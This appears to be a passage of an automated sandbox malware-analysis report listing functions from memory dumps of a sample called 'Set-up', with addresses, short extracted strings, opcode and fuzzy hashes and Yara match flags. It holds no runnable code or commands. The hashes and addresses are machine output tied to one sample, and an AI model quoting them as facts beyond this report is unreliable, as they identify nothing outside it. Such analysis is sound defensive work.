Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: 325078486bc0896a058d97b82627942891593aaf5078991bec0c705fe1fd99c6
Instruction ID: c0a16fd6a7d0b99b2f0c871fd197f2dbc032ad53b7192323a71ea4dde0200d74
Opcode Fuzzy Hash: 325078486bc0896a058d97b82627942891593aaf5078991bec0c705fe1fd99c6
Instruction Fuzzy Hash: 92A14A73E156224BD728CF69CC457ABB6D2BBC8314F1AD62DD885DB345DA78980287C0

Function 09165A72 Relevance: 2.8, Strings: 2, Instructions: 304COMMON

Download Yara Rule

Strings

7, xrefs: 09165BCA
gfff, xrefs: 09165C27

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: e507f752dc2f56c11edb64aba47821da7b6064ceeb947ba8aeaed4096da82016
Instruction ID: a316e740a2c3c9e36ea50f2efdb5a6f7bf869f380723239fc26aeb3eb65c3372
Opcode Fuzzy Hash: e507f752dc2f56c11edb64aba47821da7b6064ceeb947ba8aeaed4096da82016
Instruction Fuzzy Hash: A2A12873F156214BD728CE29CD817ABB6D3BBC4314F4AC62CE489DB355EB7898428781

Function 091582C0 Relevance: 2.8, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

${*{, xrefs: 091583BB
., xrefs: 09158319

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: ${*{$.
API String ID: 0-434639839
Opcode ID: 80764c0c871fb77f1319e22f553a3378115613b01f2afe6efb50b40a5a64836b
Instruction ID: 3fbb7f2d2cbedf8b2cd57710be5eebd2106b06d20c562b017e6405c85e683e98
Opcode Fuzzy Hash: 80764c0c871fb77f1319e22f553a3378115613b01f2afe6efb50b40a5a64836b
Instruction Fuzzy Hash: B4814F71F04316CBC7158E29C8D425AB7E2ABC0358F5B8AA9ECA69B3A5D334CC4587C1

Function 01EEB0EE Relevance: 2.8, Strings: 1, Instructions: 1513COMMON

Download Yara Rule

Strings

Fn@n, xrefs: 01EEB523

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: Fn@n
API String ID: 0-2265005453
Opcode ID: 14b1972c4976d09e00f9c53082324f23326010c554cb9f92a77b06668dee1ef5
Instruction ID: 87f1294afcf0c28a7b3c9e7a22e1d83f187c96591302034039ccfb22e651ef6d
Opcode Fuzzy Hash: 14b1972c4976d09e00f9c53082324f23326010c554cb9f92a77b06668dee1ef5
Instruction Fuzzy Hash: 8AA224766083118FE725CF68C84476FBBE2BFC8304F19582CEAC597351E7B299459B82

Function 01EE016E Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

t,, xrefs: 01EE018E
_@, xrefs: 01EE0218

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: _@$t,
API String ID: 0-2713372951
Opcode ID: eee536690401817b6e691380ab2e8879d9f82ee7cd3744f749ffd11a04326052
Instruction ID: 398c4722eba27dc4e282eb010cd8f6392403455dc02bf1e7d6c8d90b24ae3f1a
Opcode Fuzzy Hash: eee536690401817b6e691380ab2e8879d9f82ee7cd3744f749ffd11a04326052
Instruction Fuzzy Hash: B95104765187918AD7249F7888052AFB7E1AF99730F045B2EF9F6873D0D6358801C383

Function 0915E9B0 Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

_@, xrefs: 0915EA5A
t,, xrefs: 0915E9D0

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: _@$t,
API String ID: 0-2713372951
Opcode ID: c113229cc25f2916f5d6ec5b10c4e7c43c6f47d4eaa75c047cc478550f2e7972
Instruction ID: 4022b3701b44184695c60b65eec08504ab5f02964e9d990a82455450d7f47752
Opcode Fuzzy Hash: c113229cc25f2916f5d6ec5b10c4e7c43c6f47d4eaa75c047cc478550f2e7972
Instruction Fuzzy Hash: D151B572A1C75096D7299F3888112AFB6E1AF85770F168B1EF8F6872E0D734C901C782

Function 01F0E897 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

9., xrefs: 01F0E9BE
9., xrefs: 01F0E90E

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 9.$9.
API String ID: 0-2940951921
Opcode ID: 22c5d42af90c6d29735822bf6ef03d117e15d08ffdbffe749e4792ea01450d6a
Instruction ID: 17b9ae332b4203c32c2671902a27d2661f2aedbe31038a7d070d506ad37d1d63
Opcode Fuzzy Hash: 22c5d42af90c6d29735822bf6ef03d117e15d08ffdbffe749e4792ea01450d6a
Instruction Fuzzy Hash: 41416579E081209FE3159F2CCD5073AB693ABD6311F19DA38D9C6E73DADA729C109780

Function 01EE02F9 Relevance: 1.9, Strings: 1, Instructions: 661COMMON

Download Yara Rule

Strings

m, xrefs: 01EE0307

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-53672527
Opcode ID: 53cd87eb44c7515f4746b96f5bbbcff1a7affca2035a16c4ca4b1e6d102d178b
Instruction ID: b0c4ad7d69c0f948788fb1a4f21aafe3ec623f703ed774cce941a01e2e360c54
Opcode Fuzzy Hash: 53cd87eb44c7515f4746b96f5bbbcff1a7affca2035a16c4ca4b1e6d102d178b
Instruction Fuzzy Hash: 3E42AF756187918BD324DF78C4943AFB7E1AF98310F059A2EE8E9C7391E77888418B43

Function 01F0D0FE Relevance: 1.9, Strings: 1, Instructions: 652COMMON

Download Yara Rule

Strings

f, xrefs: 01F0D30F

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: 5a9574ae2d710faf99b6bddb0b7b4dcb72d488fe26a1103769c680e82ab31fa3
Instruction ID: 6a8977b42e6b221546890714c712ca1e6d5173f8ab4302085ba3f1caf601f87c
Opcode Fuzzy Hash: 5a9574ae2d710faf99b6bddb0b7b4dcb72d488fe26a1103769c680e82ab31fa3
Instruction Fuzzy Hash: 4F12E074608301CFD726CFA8C880A6FBBE2BFC9314F15492CE5958B2A1D732E905DB42

Function 0918B940 Relevance: 1.9, Strings: 1, Instructions: 652COMMON

Download Yara Rule

Strings

f, xrefs: 0918BB51

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: d9f233b107719345ed46cd7a6502d7736f7152c155ec98d06e744f948c25b63e
Instruction ID: 092ab7bc6f26e24e937fa7f69524d51db2934d74f2f6f2a5a6f867eff958443f
Opcode Fuzzy Hash: d9f233b107719345ed46cd7a6502d7736f7152c155ec98d06e744f948c25b63e
Instruction Fuzzy Hash: 1D12CE70A4C3419FD715EF18C890A2BB7E6FFC8318F158A2DE4958B2A1D731A845DF92

Function 09168170 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 091684AC

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 417fcd7bc1e72d5af02a3aee07e1f82e89d9907090cc3e30e54785f690e95ecd
Instruction ID: a2c77ed44c7ec77505bd89115a7e26ab6d75babb238765f780e8c1250dabd67a
Opcode Fuzzy Hash: 417fcd7bc1e72d5af02a3aee07e1f82e89d9907090cc3e30e54785f690e95ecd
Instruction Fuzzy Hash: CCB1E676B146128BC724CF28C8817AAB7E3FFD4314F19996DE8C89B364EB389941C741

Function 01EE2441 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

zI, xrefs: 01EE28DF

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: zI
API String ID: 0-2601089719
Opcode ID: be5e379a5406bcf6330f0ec8fa8213cf1b1695b01487a189a39976f242213a92
Instruction ID: 6f860e442b3ad5730ab1eb03340e5ed7c0f005968c402f6c077c3209bda1549f
Opcode Fuzzy Hash: be5e379a5406bcf6330f0ec8fa8213cf1b1695b01487a189a39976f242213a92
Instruction Fuzzy Hash: A612C4759087528BC768DF38C5953EEB7E1AF98320F059A2DE9EA873D0DB3484418B42

Function 01EFE61E Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

8a, xrefs: 01EFE62E

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 8a
API String ID: 0-1827930058
Opcode ID: b157fc54cf51fa9f5e0b08e8348ce43c2c6f310971f06a6b0362c38e399c31f7
Instruction ID: b22b08219435c5c871c61a34f72594fab24e1355a875d0a7b8b17bec87b2ac02
Opcode Fuzzy Hash: b157fc54cf51fa9f5e0b08e8348ce43c2c6f310971f06a6b0362c38e399c31f7
Instruction Fuzzy Hash: 41B1E07160C3818BE729CF2AC85536FFBE1AF92304F18986DE5D6873A1D7799405CB12

Function 01F112CE Relevance: 1.6, Strings: 1, Instructions: 360COMMON

Download Yara Rule

Strings

mLjL, xrefs: 01F1134E

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: mLjL
API String ID: 0-1911556848
Opcode ID: 142a4506394039a5f282ee721b04c92c436fa4b9422f498d32bbcd76d492b84d
Instruction ID: c77e55c39fc9c98003d9a83958b4613d63ee4ca32a6a4d19bb848ba6f48d70e0
Opcode Fuzzy Hash: 142a4506394039a5f282ee721b04c92c436fa4b9422f498d32bbcd76d492b84d
Instruction Fuzzy Hash: 99B1F876B082218BD728CF28C85157FB7A2EFC5710F1A893CDA8A577A4DB369C058785

Function 01EDA60E Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

XqR, xrefs: 01EDA749

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: XqR
API String ID: 0-4205905425
Opcode ID: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
Instruction ID: 2b77d649c61a284b4a9fc381f2e6cb2aeb178aca6cba4c52f671ec6a6cba5857
Opcode Fuzzy Hash: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
Instruction Fuzzy Hash: 5D71143458C3818AE321DF79D4903AAFFF0EFD2344F08546CE8C19B285D739860A8756

Function 09158E50 Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

XqR, xrefs: 09158F8B

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: XqR
API String ID: 0-4205905425
Opcode ID: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
Instruction ID: 8884faf7cbb2feed7a554fcc70c7e2477c24c113682ad920f3212c1ac8e3ecc3
Opcode Fuzzy Hash: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
Instruction Fuzzy Hash: AD710130A4C385CAD310DF7990A03ABFBF5AF96344F49486CE8D29B281D37A85098757

Function 01EF361E Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

'', xrefs: 01EF3666

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: ''
API String ID: 0-2284169615
Opcode ID: 26b9bcd60ef0186b928d6c5b83d6e2dec7e9405156a47bd96ebe94498a52c048
Instruction ID: 467a43a10f2608a24930978332b76433abccf601aa3eea91c05b86677d575227
Opcode Fuzzy Hash: 26b9bcd60ef0186b928d6c5b83d6e2dec7e9405156a47bd96ebe94498a52c048
Instruction Fuzzy Hash: 9B71E0B16043419BD7209F64CC91BABB7B4FF85318F14991CFA868B2D1E779E904C762

Function 09171E60 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

'', xrefs: 09171EA8

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: ''
API String ID: 0-2284169615
Opcode ID: d4035852db67b8686b7ba20fe988290677f493eef5f336bb8afb01288f7312aa
Instruction ID: 07d58e062365909883fc87f676b7869376bd554979f5422b047c1b4bfd86017e
Opcode Fuzzy Hash: d4035852db67b8686b7ba20fe988290677f493eef5f336bb8afb01288f7312aa
Instruction Fuzzy Hash: 5D71C3B1704302ABE7209F64CC92B6BB3B4FF85358F14491CF9968B290E775E905C761

Function 01EEF0BE Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

~, xrefs: 01EEF189

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 465fda5abb0897184b66e582f87da59961bb0ffa189b79f0d4f1fef63e1431bc
Instruction ID: 324877a42410e0f6482c86bb3df0ab9a21071abef137bf025c354e2f7b1d2b87
Opcode Fuzzy Hash: 465fda5abb0897184b66e582f87da59961bb0ffa189b79f0d4f1fef63e1431bc
Instruction Fuzzy Hash: B7815D36A046614FDB22CE28C85039EBBD1AB89224F19C27DECB99B396D734CC45D7D1

Function 0916D900 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

~, xrefs: 0916D9CB

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 7fb4e8c102e9ed665676ff1b16b39320b785f972ae26c81b4330f2173a579142
Instruction ID: c2128dd60736abf68f9325f06d46d23101a78422feb07bd29ada7defab9d1f85
Opcode Fuzzy Hash: 7fb4e8c102e9ed665676ff1b16b39320b785f972ae26c81b4330f2173a579142
Instruction Fuzzy Hash: EB815D76F082614FC7118D289C9136EBBD1AB86268F19C67DECBA9B3D5D3348815C7C1

Function 01F08B8E Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

`', xrefs: 01F08D4A

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: `'
API String ID: 0-2167327795
Opcode ID: 91496f2717543ea028079e70e2cd86b6fcc0d575298fe328bc32889010d7d404
Instruction ID: 3c9a6e29734cfa50fdb30349727a593a96fdd237228c1b580afd2a55d2e3e9b9
Opcode Fuzzy Hash: 91496f2717543ea028079e70e2cd86b6fcc0d575298fe328bc32889010d7d404
Instruction Fuzzy Hash: BF7166239287514BD3119A78C8800ABBBE3AFD4360F29CA3CD4D697795E13AC8069307

Function 091873D0 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

`', xrefs: 0918758C

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: `'
API String ID: 0-2167327795
Opcode ID: 91496f2717543ea028079e70e2cd86b6fcc0d575298fe328bc32889010d7d404
Instruction ID: 24f393063222787604ea33c3cb40d4c0b00a3294f57f58e67f791890394d58d7
Opcode Fuzzy Hash: 91496f2717543ea028079e70e2cd86b6fcc0d575298fe328bc32889010d7d404
Instruction Fuzzy Hash: 4B713463A2C3514AD314AB3DC8800ABABE3AFD5324F398A3CD4E5D7794E239C4069753

Function 01EEADBB Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

Q R , xrefs: 01EEAF17

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: Q R
API String ID: 0-3646680613
Opcode ID: 32d966ae9fdab9915fb8afc0a06445e1c5604de388feaf4180a495f8dbdd9674
Instruction ID: 5c134c6664262353e54a2a4670633ac22c400910d92ad0c5eca5bcb39a0b91b3
Opcode Fuzzy Hash: 32d966ae9fdab9915fb8afc0a06445e1c5604de388feaf4180a495f8dbdd9674
Instruction Fuzzy Hash: 4C41B0705042509BC7399F28C8A96BBB3F5FFE6354F055A2CE9CA4B3A1EB354981C742

Function 091695FD Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

Q R , xrefs: 09169759

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: Q R
API String ID: 0-3646680613
Opcode ID: 5786b2de07024507c86bf70be4b587ddae182a2425afb8e69ead8daae9e3aa77
Instruction ID: 9d2c73b5cdf02093be2f6774fa4fbf73f94240b527ad2792a15f720a11409fa6
Opcode Fuzzy Hash: 5786b2de07024507c86bf70be4b587ddae182a2425afb8e69ead8daae9e3aa77
Instruction Fuzzy Hash: 4341AF70A04210DBC7389F28C8957B7B3B6FF96358F054A1CE8DA8B3A1EB354951C792

Function 01EFCC4A Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

EVJ_, xrefs: 01EFCCE9

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: EVJ_
API String ID: 0-352177915
Opcode ID: 4f677c5bacfc321699cb78afe51e88b79b6ee33044fbd01274c2f648ee761e36
Instruction ID: eec3af54d015f725654de5f2d884eff74aeae0d3238f239432947a4f96407a5c
Opcode Fuzzy Hash: 4f677c5bacfc321699cb78afe51e88b79b6ee33044fbd01274c2f648ee761e36
Instruction Fuzzy Hash: 355124356093914AE729CF29C4547BEFBE2AFD7304F38D4ADC4C997296DB3540068B52

Function 0917B48C Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

EVJ_, xrefs: 0917B52B

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: EVJ_
API String ID: 0-352177915
Opcode ID: 13ce7bfc2377832888d6a04d1da9161da6a1f3b5a1218e660e81633641ac98f6
Instruction ID: 7f8aeff5fc039e6648b0515de7980331f3532f03bb94cdb766bcd7c8dd1a5a25
Opcode Fuzzy Hash: 13ce7bfc2377832888d6a04d1da9161da6a1f3b5a1218e660e81633641ac98f6
Instruction Fuzzy Hash: C8510431A0E3924AE729CF39C4543ABFBE2AFD7304F29C5ADD4C997291DB3544068752

Function 01EFCFFF Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

Nv, xrefs: 01EFD0AD

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: Nv
API String ID: 0-2521146493
Opcode ID: 091e8d29a3aa4794f3b49027741e1771532033d3de6f75df74f524547c5ed0d4
Instruction ID: de3a2ab9cf560f32a5e10dd8fe2615c89448d9ea4a8ed3aa2da589afd63fb304
Opcode Fuzzy Hash: 091e8d29a3aa4794f3b49027741e1771532033d3de6f75df74f524547c5ed0d4
Instruction Fuzzy Hash: 915111755082818BE339CB78C8607FBBBE2EFD6304F58986DC5CAC7295EB3944058B56

Function 0917B841 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

Nv, xrefs: 0917B8EF

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: Nv
API String ID: 0-2521146493
Opcode ID: 7407769405cde783aa22b4a02fa6834abee60929196ea3c0d6d0b37c923a2341
Instruction ID: 77071de0cd15ebe6e2b08484f970edae571200d1576318aa6cf878014abdbb5e
Opcode Fuzzy Hash: 7407769405cde783aa22b4a02fa6834abee60929196ea3c0d6d0b37c923a2341
Instruction Fuzzy Hash: 1C51E175A1C3868BD329CB39C8507BBB7E1EFD6304F58986DD4DAD7290EB3444048B52

Function 01F116BE Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 01F11788

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c9bbfcb5aa9756c92b3a09fc69560f6cd0ee8f2c5c3c6cf9a01b90dc8085e214
Instruction ID: fa6c1a7d2bb2395eb217a71bd0b075059ef854c4b284cec46788f41defd55028
Opcode Fuzzy Hash: c9bbfcb5aa9756c92b3a09fc69560f6cd0ee8f2c5c3c6cf9a01b90dc8085e214
Instruction Fuzzy Hash: 93414776A093019BD714CF24CC15B6BBBA2FFC4364F19891CEA851B3A4E7769805C786

Function 0918FF00 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 0918FFCA

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 03087a4055560ea9613f7205a7fd15ef30b0040730ee3668bdac8a6c49fd14d8
Instruction ID: 4e358362fa413317007bc2b5d05a0471305b12321a5ab1d173411b8fa67a964b
Opcode Fuzzy Hash: 03087a4055560ea9613f7205a7fd15ef30b0040730ee3668bdac8a6c49fd14d8
Instruction Fuzzy Hash: B5415472A153009BD7149F24CC15B6BBBA2FFC4368F19861CF8991B3A0E7759815CB82

Function 01EDE100 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

G9, xrefs: 01EDE150

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: G9
API String ID: 0-2716091189
Opcode ID: 2fc45742e1a3686705e5dce742a14d5a280d3b57a4ce65dfcae4e6ba49c632fe
Instruction ID: 4d5645ffedf18c6055d5e725086145e625173bd4cfa515ed60930fc582671692
Opcode Fuzzy Hash: 2fc45742e1a3686705e5dce742a14d5a280d3b57a4ce65dfcae4e6ba49c632fe
Instruction Fuzzy Hash: 764114726483218BD728CF24CC456AFB7F2FFC5314F0A592CE4855BB50E6789505D74A

Function 01F1187E Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

@, xrefs: 01F11930

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 2609b23c453592d0f4839c06d52b4ca1844d0b5ae2dfc179b00bc35f1c5877bd
Instruction ID: d2b94b41e9398fac77257898b218be5ea59df344dc07cfe4a354e702b3b293be
Opcode Fuzzy Hash: 2609b23c453592d0f4839c06d52b4ca1844d0b5ae2dfc179b00bc35f1c5877bd
Instruction Fuzzy Hash: 184147759093108BD714CF24CC9066BB7E2EF95324F05852CEA994B3A4E7368805C782

Function 01F0F17F Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

@, xrefs: 01F0F20B

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 896969361a35f879d1a92551f07d1752423d28e4cd4e992b3f8299d5e44bdf0b
Instruction ID: 8eadc55cd27fa5967bef05c4babb810d6fd4e38d772142b4a19de0ca3b033ec0
Opcode Fuzzy Hash: 896969361a35f879d1a92551f07d1752423d28e4cd4e992b3f8299d5e44bdf0b
Instruction Fuzzy Hash: C84113B4A08210DFE729CF28CD5073BB7E2EFC6701F54992CE581A7394E73298059746

Function 01EFA80C Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

Dkpk, xrefs: 01EFA85E, 01EFA929

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: Dkpk
API String ID: 0-2230318481
Opcode ID: cf1a1df2cccf502249e80f8767bee934b3f81d63e9dce52cdd7222a5ef567c20
Instruction ID: 01d32328f44766eb024d66e0b2cf2ea76f6ca9928b37434d9bd647aed6754710
